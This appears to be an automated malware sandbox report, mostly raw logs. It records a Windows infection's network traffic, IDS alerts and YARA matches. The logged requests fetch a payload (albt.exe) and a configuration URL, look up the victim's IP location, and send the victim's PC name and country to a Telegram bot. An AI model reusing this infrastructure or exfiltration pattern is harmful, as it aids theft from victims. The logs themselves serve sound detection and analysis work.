          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739

          Networking

          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49778 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49805 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49818 -> 149.154.167.220:443
          Source: Malware configuration extractorURLs: https://amazonenviro.com/245_Nsltarpncon
          Source: unknownDNS query: name: api.telegram.org
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291E72C InternetCheckConnectionA,4_2_0291E72C
          Source: global trafficTCP traffic: 192.168.2.4:49796 -> 46.151.208.21:587
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 05 Jan 2025 23:00:50 GMTAccept-Ranges: bytesETag: "ef51f5a9c55fdb1:0"Server: Microsoft-IIS/8.5Date: Mon, 06 Jan 2025 06:53:13 GMTContent-Length: 1161216
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:16:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:55:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2018:43:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 166.62.27.188:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49756 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49753 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49779 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49767 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49794 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49786 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49762 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49764 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49776 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49798 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49802 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49791 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49806 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49768 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49783 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49795 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
          Source: global trafficHTTP traffic detected: GET /albt.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49754 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49773 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49789 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: global traffic HTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
          Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
